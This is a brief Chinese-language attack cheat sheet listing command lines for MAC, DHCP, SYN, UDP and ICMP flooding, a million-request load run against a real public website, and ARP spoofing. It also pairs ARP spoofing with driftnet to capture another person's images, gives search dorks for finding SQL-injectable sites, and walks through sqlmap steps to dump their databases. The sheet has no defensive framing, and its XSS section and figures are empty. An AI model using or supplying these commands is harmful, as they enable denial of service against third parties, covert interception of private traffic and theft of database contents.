# 常见的DOS攻击方式
1. mac flood
macof
2. dhcp flood
2.1. 安装命令工具
apt-get install -y yersinia
2.2. 打开工具客户端
yersinia -G
2.3. 开始dhcp-flood攻击
查看图1-1
3. TCP SYN flood
hping3 --flood -S --rand-source -p 9999 192.168.2.1
4. UDP flood
hping3 --flood --udp --rand-source -p 8000 192.168.2.1
5. ICMP flood
hping3 --flood --icmp --rand-source -p 1400 192.168.2.1
6. ab测试
ab -n 1000000 -c 1000 https://www.baidu.com
7. arp欺骗/定向攻击
arpspoof -i eth0 -t 192.168.2.113 192.168.2.1
8. 抓取妹子图片
8.1. arp欺骗
arpspoof -t 192.168.2.113 192.168.2.1
8.2. 报文转发
echo 1 > /proc/sys/net/ipv4/ip_forward
8.3. 抓取图片
driftnet -i eth0
9. SQL注入
9.1. 搜索引擎查找带有SQL注入点的网站
inurl:.asp?=id=1
inurl:.php?=id=1
9.2. sqlmap探测数据库版本
sqlmap -u "url"
9.3. sqlmap探测数据库版本、web容器、数据库、编程语言
sqlmap -u "url" --dbs
9.4. sqlmap探测数据库表名
sqlmap -u "url" -D db_name --tables
9.5. sqlmap探测数据库列名
sqlmap -u "url" -D db_name -T table_name --columns
9.6. sqlmap探测数据库列值
sqlmap -u "url" -D db_name -T table_name -C column_name --dump
9.7. 如果经过md5加密,可以使用如下测试反解析
https://www.cmd5.com/
10.XSS攻击
图1-1
图1-2
